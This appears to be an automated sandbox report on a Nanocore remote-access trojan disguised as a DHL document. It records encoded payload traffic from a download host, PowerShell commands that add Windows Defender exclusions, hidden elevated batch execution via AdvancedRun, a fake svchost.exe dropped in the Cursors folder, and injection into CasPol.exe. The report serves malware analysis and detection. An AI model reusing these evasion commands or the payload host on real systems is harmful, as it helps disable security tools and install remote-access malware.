58 65 69 6b 65 6b 4d 49 65 49 65 58 53 65 44 6b 65 72 6b 65 61 53 69 65 61 61 72 65 6b 69 61 65 72 53 65 69 78 65 6b 4d 53 65 61 6b 72 65 4d 78 65 49 53 65 6b 49 72 65 61 72 6b 65 61 69 65 61 58 53 65 61 72 78 65 61 6b 6b 65 61 44 44 65 61 6b 78 65 58 44 65 6b 61 53 65 53 69 65 72 49 65 61 69 69 65 4d 58 65 61 78 65 61 53 49 65 78 65 61 4d 58 65 69 78 65 53 6b 65 61 78 61 65 61 53 4d 65 6b 49 58 65 61 61 72 65 61 69 6b 65 6b 6b 58 65 6b 58 65 61 69 4d 65 6b 49 65 61 72 49 65 61 58 65 61 4d 4d 65 72 53 65 61 49 49 65 6b 53 65 6b 4d 53 65 6b 49 49 65 6b 49 58 65 61 44 6b 65 4d 72 65 61 4d 53 65 61 6b 53 65 6b 49 61 65 61 44 49 65 61 72 44 65 4d 49 65 61 61 65 58 65 61 Data Ascii: 913<p>kDeMMeakxeaareaxreiSeaIrekaaeaSaeXSeakSekaxeDDeakxeaxaeaiXekIMerXeSSeaDMekkXeaaMeakXeaDekISearreakaeIiekkMeIDekeMIekarekkSeDrekaMeaSekiearrexeakIeaaIekikeaxeaIreSIeaSreIeaSaeIXeaXDeaiSeaMXeMDeakaeMSeMkekkSeakMekxkeMDeaIeaXaekMXeikekMIeIeXSeDkerkeaSieaarekiaerSeixekMSeakreMxeISekIrearkeaieaXSearxeakkeaDDeakxeXDekaSeSierIeaiieMXeaxeaSIexeaMXeixeSkeaxaeaSMekIXeaareaikekkXekXeaiMekIearIeaXeaMMerSeaIIekSekMSekIIekIXeaDkeMreaMSeakSekIaeaDIearDeMIeaaeXea
Feb 25, 2021 11:05:42.977694035 CET	13968	OUT	GET /base/40146EDED8BA63D6AE3F2DAF99B02171.html HTTP/1.1 Host: coroloboxorozor.com
Feb 25, 2021 11:05:43.060276031 CET	13970	IN	HTTP/1.1 200 OK Date: Thu, 25 Feb 2021 10:05:43 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d32fa4bde8d2845333a55e5566c5da0b91614247543; expires=Sat, 27-Mar-21 10:05:43 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax Last-Modified: Thu, 25 Feb 2021 01:01:31 GMT Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN CF-Cache-Status: DYNAMIC cf-request-id: 087a3fd8e70000bd8260084000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=pNv2IARAHyIMnXz5%2BYalLkBB4lmtmqJW5HfLzk1dgOpRZBk3nKHaRIDe83tDq7%2FrZERY%2FpT8%2BoDS6MPnb1HwrcpYYLis0CIQqheaKc9dbquSNdsd"}],"max_age":604800,"group":"cf-nel"} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 62709c07ddf8bd82-AMS alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 34 37 62 66 0d 0a 3c 70 3e 4d 58 65 61 72 78 65 4d 58 65 61 69 58 65 4d 58 65 61 72 69 65 4d 58 65 61 69 78 65 4d 58 65 61 72 58 65 4d 58 65 61 72 69 65 4d 58 65 61 65 61 61 65 49 58 65 78 65 49 53 65 78 65 49 53 65 78 65 69 61 65 78 65 69 61 65 78 65 78 65 49 4d 65 6b 49 53 65 61 58 53 65 61 72 65 61 58 58 65 6b 49 65 61 58 58 65 6b 61 69 65 61 58 53 65 6b 61 4d 65 61 58 53 65 6b 4d 6b 65 61 58 53 65 72 65 61 58 58 65 6b 61 65 61 58 58 65 6b 49 69 65 61 58 53 65 58 65 61 58 58 65 61 58 65 61 58 58 65 72 65 61 58 58 65 6b 65 61 58 58 65 69 65 61 58 58 65 6b 6b 53 65 61 58 53 65 61 72 65 61 58 58 65 61 69 65 61 58 58 65 6b 61 65 61 58 58 65 72 65 61 58 58 65 6b 69 65 61 58 58 65 6b 61 65 61 58 58 65 61 65 61 61 65 69 4d 65 78 65 49 53 65 78 65 69 72 65 78 65 69 6b 65 78 65 69 44 65 78 65 78 65 4d 69 65 61 61 6b 65 6b 61 61 65 61 4d 61 65 6b 61 61 65 61 6b 44 65 6b 61 61 65 61 4d 78 65 6b 61 61 65 61 61 78 65 6b 61 61 65 61 49 49 65 6b 61 61 65 61 49 61 65 6b 61 61 65 61 6b 58 65 6b 61 61 65 61 4d 61 65 6b 61 61 65 61 49 69 65 6b 61 61 65 61 49 69 65 6b 61 61 65 61 78 44 65 6b 61 61 65 61 4d 61 65 6b 61 61 65 61 4d 58 65 6b 61 61 65 61 49 61 65 6b 61 61 65 61 49 49 65 6b 61 61 65 61 69 61 65 6b 61 61 65 61 65 61 61 65 69 4d 65 78 65 69 6b 65 78 65 49 53 65 78 65 69 6b 65 78 65 69 49 65 78 65 78 65 49 61 65 61 44 58 65 4d 44 65 6b 78 53 65 4d 44 65 61 Data Ascii: 47bf<p>MXearxeMXeaiXeMXearieMXeaixeMXearXeMXearieMXeaeaaeIXexeISexeISexeiaexeiaexexeIMekISeaXSeareaXXekIeaXXekaieaXSekaMeaXSekMkeaXSereaXXekaeaXXekIieaXSeXeaXXeaXeaXXereaXXekeaXXeieaXXekkSeaXSeareaXXeaieaXXekaeaXXereaXXekieaXXekaeaXXeaeaaeiMexeISexeirexeikexeiDexexeMieaakekaaeaMaekaaeakDekaaeaMxekaaeaaxekaaeaIIekaaeaIaekaaeakXekaaeaMaekaaeaIiekaaeaIiekaaeaxDekaaeaMaekaaeaMXekaaeaIaekaaeaIIekaaeaiaekaaeaeaaeiMexeikexeISexeikexeiIexexeIaeaDXeMDekxSeMDea

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: DHL_document1102202068090891.exe PID: 5308 Parent PID: 5652

General

Start time:	11:04:05
Start date:	25/02/2021
Path:	C:\Users\user\Desktop\DHL_document1102202068090891.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\DHL_document1102202068090891.exe'
Imagebase:	0xef0000
File size:	61312 bytes
MD5 hash:	5E86EC60BC329DB96BE8D476537A554C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.544960546.00000000047D2000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.544960546.00000000047D2000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000002.544960546.00000000047D2000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 1000 Parent PID: 556

General

Start time:	11:04:22
Start date:	25/02/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 4616 Parent PID: 556

General

Start time:	11:04:31
Start date:	25/02/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 4564 Parent PID: 556

General

Start time:	11:04:32
Start date:	25/02/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 1056 Parent PID: 556

General

Start time:	11:04:33
Start date:	25/02/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 1036 Parent PID: 556

General

Start time:	11:04:34
Start date:	25/02/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 6016 Parent PID: 5308

General

Start time:	11:04:45
Start date:	25/02/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe' -Force
Imagebase:	0x12f0000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 4908 Parent PID: 6016

General

Start time:	11:04:45
Start date:	25/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: AdvancedRun.exe PID: 1864 Parent PID: 5308

General

Start time:	11:04:46
Start date:	25/02/2021
Path:	C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Imagebase:	0x400000
File size:	91000 bytes
MD5 hash:	17FC12902F4769AF3A9271EB4E2DACCE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 3%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	moderate

Chronological Activities

Analysis Process: svchost.exe PID: 6328 Parent PID: 556

General

Start time:	11:04:53
Start date:	25/02/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: AdvancedRun.exe PID: 6344 Parent PID: 1864

General

Start time:	11:04:54
Start date:	25/02/2021
Path:	C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe' /SpecialRun 4101d8 1864
Imagebase:	0x400000
File size:	91000 bytes
MD5 hash:	17FC12902F4769AF3A9271EB4E2DACCE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: explorer.exe PID: 6384 Parent PID: 3472

General

Start time:	11:04:55
Start date:	25/02/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\explorer.exe' 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe'
Imagebase:	0x7ff693d90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: explorer.exe PID: 6444 Parent PID: 792

General

Start time:	11:04:56
Start date:	25/02/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Imagebase:	0x7ff693d90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 6560 Parent PID: 6444

General

Start time:	11:04:59
Start date:	25/02/2021
Path:	C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe'
Imagebase:	0x9f0000
File size:	61312 bytes
MD5 hash:	5E86EC60BC329DB96BE8D476537A554C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000002.544943741.000000000430F000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000002.544943741.000000000430F000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000011.00000002.544943741.000000000430F000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 33%, ReversingLabs

Chronological Activities

Analysis Process: powershell.exe PID: 6624 Parent PID: 5308

General

Start time:	11:05:01
Start date:	25/02/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DHL_document1102202068090891.exe' -Force
Imagebase:	0x12f0000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: conhost.exe PID: 6632 Parent PID: 6624

General

Start time:	11:05:01
Start date:	25/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 6644 Parent PID: 5308

General

Start time:	11:05:01
Start date:	25/02/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\cmd.exe' /c timeout 1
Imagebase:	0x1390000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 6652 Parent PID: 556

General

Start time:	11:05:01
Start date:	25/02/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6692 Parent PID: 6644

General

Start time:	11:05:02
Start date:	25/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: timeout.exe PID: 6832 Parent PID: 6644

General

Start time:	11:05:02
Start date:	25/02/2021
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout 1
Imagebase:	0xb60000
File size:	26112 bytes
MD5 hash:	121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: explorer.exe PID: 6840 Parent PID: 3472

General

Start time:	11:05:03
Start date:	25/02/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\explorer.exe' 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe'
Imagebase:	0x7ff693d90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: explorer.exe PID: 6956 Parent PID: 792

General

Start time:	11:05:05
Start date:	25/02/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Imagebase:	0x7ff693d90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 7084 Parent PID: 556

General

Start time:	11:05:07
Start date:	25/02/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 7148 Parent PID: 6956

General

Start time:	11:05:08
Start date:	25/02/2021
Path:	C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe'
Imagebase:	0xad0000
File size:	61312 bytes
MD5 hash:	5E86EC60BC329DB96BE8D476537A554C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001C.00000002.543251582.00000000047D4000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001C.00000002.543251582.00000000047D4000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000001C.00000002.543251582.00000000047D4000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

Chronological Activities

Analysis Process: CasPol.exe PID: 2900 Parent PID: 5308

General

Start time:	11:05:12
Start date:	25/02/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
Imagebase:	0x6a0000
File size:	107624 bytes
MD5 hash:	F866FC1C2E928779C7119353C3091F0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000002.529223776.0000000002D91000.00000004.00000001.sdmp, Author: Joe Security Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000002.504221137.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000002.504221137.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000001D.00000002.504221137.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000002.533736388.0000000003DD9000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000001D.00000002.533736388.0000000003DD9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000002.539788145.0000000005370000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000001D.00000002.539788145.0000000005370000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000002.540084949.0000000005AE0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000001D.00000002.540084949.0000000005AE0000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000002.540084949.0000000005AE0000.00000004.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: svchost.exe PID: 5304 Parent PID: 556

General

Start time:	11:05:13
Start date:	25/02/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 5044 Parent PID: 5304

General

Start time:	11:05:14
Start date:	25/02/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5308 -ip 5308
Imagebase:	0xd60000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 5196 Parent PID: 5308

General

Start time:	11:05:16
Start date:	25/02/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5308 -s 2256
Imagebase:	0xd60000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: svchost.exe PID: 5240 Parent PID: 556

General

Start time:	11:05:20
Start date:	25/02/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: MpCmdRun.exe PID: 2588 Parent PID: 1036

General

Start time:	11:05:35
Start date:	25/02/2021
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Imagebase:	0x7ff70d9f0000
File size:	455656 bytes
MD5 hash:	A267555174BFA53844371226F482B86B
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6400 Parent PID: 2588

General

Start time:	11:05:35
Start date:	25/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: DHL_document1102202068090891.exe PID: 5308 Parent PID: 5652 DHL_document1102202068090891.exeCOMMON

Executed Functions

Function 06CD0040, Relevance: 48.8, Strings: 23, Instructions: 20001COMMON

Download Yara Rule

Strings

xb\rsu\wdi\C, xrefs: 06CDFB4C, 06CDFA3C
F}Il, xrefs: 06CDE4B0
Z1l, xrefs: 06CDAE1A
F}Il, xrefs: 06CDFC1B
F}Il, xrefs: 06CDC3E8
Z1l, xrefs: 06CD21A8
Z1l, xrefs: 06CD0371
su\wdi\C, xrefs: 06CD2185
F}Il, xrefs: 06CD3277
F}Il, xrefs: 06CD4E0E
F}Il, xrefs: 06CE1D96
F}Il, xrefs: 06CE355F
rsu\wdi\C, xrefs: 06CD50B4
\wdi\C, xrefs: 06CDFB25, 06CDFA21
Z1l, xrefs: 06CD853A
F}Il, xrefs: 06CE5C55
F}Il, xrefs: 06CD66DA
F}Il, xrefs: 06CE7895
Z1l, xrefs: 06CE079B
Z1l, xrefs: 06CD3EFF
b\rsu\wdi\C, xrefs: 06CDFB49, 06CDFA39
Z1l, xrefs: 06CE9B2D
Z1l, xrefs: 06CDD9B4

Memory Dump Source

Source File: 00000000.00000002.552787563.0000000006CD0000.00000040.00000001.sdmp, Offset: 06CD0000, based on PE: false

Similarity

API ID:
String ID: F}Il$F}Il$F}Il$F}Il$F}Il$F}Il$F}Il$F}Il$F}Il$F}Il$\wdi\C$b\rsu\wdi\C$rsu\wdi\C$su\wdi\C$xb\rsu\wdi\C$Z1l$Z1l$Z1l$Z1l$Z1l$Z1l$Z1l$Z1l
API String ID: 0-14278459
Opcode ID: 86aedd45b7b5c557193b8958898b8e6cd2fd77923f6fe448eb720a28d15b3ea9
Instruction ID: a8540a7dc089a7fb0ad8a16f527333435548289481549bbffc8056f16297c13e
Opcode Fuzzy Hash: 86aedd45b7b5c557193b8958898b8e6cd2fd77923f6fe448eb720a28d15b3ea9
Instruction Fuzzy Hash: 10B43C34D26254CFC764CF04CA88A99B7F2BF01345F86D0EAD5195F622E3B2DA88CB55

Uniqueness

Uniqueness Score: -1.00%

Function 069D0006, Relevance: 7.5, Strings: 4, Instructions: 2515COMMON

Download Yara Rule

Strings

F}Il, xrefs: 069D0055
.st}{ mnlFX/, xrefs: 069D332D, 069D3341
/"a.st}{ mnlFX/, xrefs: 069D333E
Z1l, xrefs: 069D07A3

Memory Dump Source

Source File: 00000000.00000002.552667476.00000000069D0000.00000040.00000001.sdmp, Offset: 069D0000, based on PE: false

Similarity

API ID:
String ID: .st}{ mnlFX/$/"a.st}{ mnlFX/$F}Il$Z1l
API String ID: 0-4020812773
Opcode ID: b7bae4c1580bed43d1161054e8a228111b4996269faf0f5692976fb81ca9e6c7
Instruction ID: 39ebbba214a41460cc1eb9f29651d6a904e989f77faff9e9fb74f27fed6251d6
Opcode Fuzzy Hash: b7bae4c1580bed43d1161054e8a228111b4996269faf0f5692976fb81ca9e6c7
Instruction Fuzzy Hash: D5236F94E2124088C7B58B008798D6DE6A7AF56389FB5D2BFC0541FE36D7B5C188D38B

Uniqueness

Uniqueness Score: -1.00%

Function 069D0040, Relevance: 7.5, Strings: 4, Instructions: 2504COMMON

Download Yara Rule

Strings

F}Il, xrefs: 069D0055
.st}{ mnlFX/, xrefs: 069D332D, 069D3341
/"a.st}{ mnlFX/, xrefs: 069D333E
Z1l, xrefs: 069D07A3

Memory Dump Source

Source File: 00000000.00000002.552667476.00000000069D0000.00000040.00000001.sdmp, Offset: 069D0000, based on PE: false

Similarity

API ID:
String ID: .st}{ mnlFX/$/"a.st}{ mnlFX/$F}Il$Z1l
API String ID: 0-4020812773
Opcode ID: 47d24da1a7393fd3a52ec0c48c57cce0bf1a9e5075b2f13349ba7e345784f272
Instruction ID: c3362facd9cbc40f2ac1e6e0db4af2384dd112eba377f59380a84efa6fc0af8b
Opcode Fuzzy Hash: 47d24da1a7393fd3a52ec0c48c57cce0bf1a9e5075b2f13349ba7e345784f272
Instruction Fuzzy Hash: C2236F94E2124088C7B58B008798D6DE6A7AF56389FB5D2BFC0541FE36D7B5C188D38B

Uniqueness

Uniqueness Score: -1.00%

Function 069D6998, Relevance: 1.6, APIs: 1, Instructions: 53nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(?,00000011,?,?,?,?,?,?,?,069D706F,00000000,00000000), ref: 069D71C0

Memory Dump Source

Source File: 00000000.00000002.552667476.00000000069D0000.00000040.00000001.sdmp, Offset: 069D0000, based on PE: false

Similarity

API ID: InformationThread
String ID:
